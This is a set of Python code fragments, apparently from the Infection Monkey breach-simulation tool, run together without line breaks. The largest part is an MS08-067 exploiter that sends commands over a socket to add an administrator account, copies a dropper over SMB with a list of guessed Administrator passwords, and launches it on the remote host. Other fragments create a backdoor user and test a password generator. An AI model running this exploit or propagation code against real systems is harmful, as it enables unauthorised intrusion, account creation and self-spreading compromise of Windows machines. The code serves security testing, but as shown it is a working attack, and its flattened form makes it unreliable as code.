def __init__(self): random_password = get_random_password() linux_cmds, windows_cmds = get_commands_to_add_user( WormConfiguration.user_to_add, random_password) super(BackdoorUser, self).__init__(POST_BREACH_BACKDOOR_USER, linux_cmd=" ".join(linux_cmds), windows_cmd=windows_cmds)
def run(self): username = CommunicateAsBackdoorUser.get_random_new_user_name() try: password = get_random_password(14) with create_auto_new_user(username, password) as new_user: http_request_commandline = ( CommunicateAsBackdoorUser.get_commandline_for_http_request( INFECTION_MONKEY_WEBSITE_URL ) ) exit_status = new_user.run_as(http_request_commandline) self.send_result_telemetry(exit_status, http_request_commandline, username) except subprocess.CalledProcessError as e: PostBreachTelem(self, (e.output.decode(), False)).send() except NewUserError as e: PostBreachTelem(self, (str(e), False)).send()
def test_get_random_password__randomness(): random_password1 = get_random_password() random_password2 = get_random_password() assert not random_password1 == random_password2
def test_get_random_password__length(): password_byte_length = len(get_random_password().encode()) # 32 is the recommended secure byte length for secrets assert password_byte_length >= 32
def test_get_random_password__custom_length(): password_length = len(get_random_password(14)) assert password_length == 14
def _exploit_host(self): src_path = get_target_monkey(self.host) if not src_path: logger.info("Can't find suitable monkey executable for host %r", self.host) return False os_version = self._windows_versions.get(self.host.os.get("version"), WindowsVersion.Windows2003_SP2) exploited = False random_password = get_random_password() for _ in range(self._config.ms08_067_exploit_attempts): exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version) try: sock = exploit.start() sock.send( "cmd /c (net user {} {} /add) &&" " (net localgroup administrators {} /add)\r\n".format( self._config.user_to_add, random_password, self._config.user_to_add, ).encode()) time.sleep(2) sock.recv(1000) logger.debug("Exploited into %r using MS08-067", self.host) exploited = True break except Exception as exc: logger.debug("Error exploiting victim %r: (%s)", self.host, exc) continue if not exploited: logger.debug("Exploiter MS08-067 is giving up...") return False # copy the file remotely using SMB remote_full_path = SmbTools.copy_file( self.host, src_path, self._config.dropper_target_path_win_32, self._config.user_to_add, random_password, ) if not remote_full_path: # try other passwords for administrator for password in self._config.exploit_password_list: remote_full_path = SmbTools.copy_file( self.host, src_path, self._config.dropper_target_path_win_32, "Administrator", password, ) if remote_full_path: break if not remote_full_path: return True # execute the remote dropper in case the path isn't final if remote_full_path.lower( ) != self._config.dropper_target_path_win_32.lower(): cmdline = DROPPER_CMDLINE_WINDOWS % { "dropper_path": remote_full_path } + build_monkey_commandline( self.host, get_monkey_depth() - 1, SRVSVC_Exploit.TELNET_PORT, self._config.dropper_target_path_win_32, ) else: cmdline = MONKEY_CMDLINE_WINDOWS % { "monkey_path": remote_full_path } + build_monkey_commandline( self.host, get_monkey_depth() - 1, vulnerable_port=SRVSVC_Exploit.TELNET_PORT) try: sock.send(("start %s\r\n" % (cmdline, )).encode()) sock.send(("net user %s /delete\r\n" % (self._config.user_to_add, )).encode()) except Exception as exc: logger.debug( "Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc) return True finally: try: sock.close() except socket.error: pass logger.info( "Executed monkey '%s' on remote victim %r (cmdline=%r)", remote_full_path, self.host, cmdline, ) return True